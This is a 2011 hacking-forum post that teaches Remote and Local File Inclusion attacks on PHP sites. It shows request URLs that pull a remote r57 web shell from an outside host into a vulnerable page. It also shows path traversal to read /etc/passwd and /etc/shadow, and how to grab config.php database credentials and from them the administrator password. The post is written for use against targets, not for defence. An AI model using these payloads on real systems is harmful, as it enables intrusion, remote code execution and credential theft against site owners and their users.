ShadowNET Posted March 20, 2011 Share Posted March 20, 2011 This is a guide I wrote for my board: www.leethackers.org. What is RFI? RFI or also known as Remote File Inclusion can be used to execute php code from a remote host. This can be really useful. For example: www.target.com/index.php?page=index.txt Here we see, it takes the text of the text file: "index.txt" and places it into index.php. It is the include() PHP Function. Sadly, no-one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into the index.php. What if we change the index.txt to a Remote server for example: www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now: www.target.com/index.php?page=www.t00ls.org/r57.txt If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy. What is LFI? LFI or also known as Local File Inclusion can be used to display sensitive information from a specified file on the webhost. The concept is almost the same like RFI. The only thing that is different, the files are on localhost. For example, we have this page: www.target.com/index.php?page=contact.php So it shows the contact.php form. Now let us try this: www.target.com/index.php?page=../../../etc/passwd If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x''s though. Try to check the 'shadow' File. So do this: www.target.com/index.php?page=../../../etc/shadow This file is normally not readable for the users. It is only readable for 'root'. What you could try, is getting the config.php file that is mostly located in the include folder. so: www.target.com/index.php?page=./include/config.php If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table. Hope this small explaination helped you a bit! Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.